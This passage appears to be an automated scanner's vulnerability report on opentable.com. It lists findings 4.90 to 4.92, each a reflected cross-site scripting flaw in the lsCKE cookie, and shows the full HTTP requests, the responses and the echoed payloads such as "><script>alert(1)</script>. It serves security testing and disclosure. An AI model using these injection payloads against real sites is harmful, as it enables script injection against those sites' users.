Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=9&vbefreg=9&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46311


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<!--
var s_account="otrestref86571"-alert(1)-"6df2532a40d";
//-->
...[SNIP]...

4.90. http://www.opentable.com/opentables.aspx [lsCKE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the lsCKE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4b9d"><script>alert(1)</script>274d9f2ce68 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a00&p1=100&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=QhdvlhkoLANtmN5uiMYSSg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46341


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<img src="http://o.opentable.com/b/ss/otrestrefb4b9d"><script>alert(1)</script>274d9f2ce68/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...

4.91. http://www.opentable.com/rest_profile.aspx [lsCKE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /rest_profile.aspx

Issue detail

The value of the lsCKE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f96d"><script>alert(1)</script>5ac8eae4578 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /rest_profile.aspx?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a01&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=8&vbefreg=8&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=8&vbefreg=8&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV25wOFHxjGvbfxb0e%2fAJElb; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199802


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
<img src="http://o.opentable.com/b/ss/otrestref3f96d"><script>alert(1)</script>5ac8eae4578/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...

4.92. http://www.opentable.com/rest_profile.aspx [lsCKE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /rest_profile.aspx

Issue detail

The value of the lsCKE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79263"-alert(1)-"082a2fb7275 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rest_profile.aspx?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a01&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=20&vbefreg=20&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=20&vbefreg=20&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV3LkCIYIt56OZ2ell2dPt4Y; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
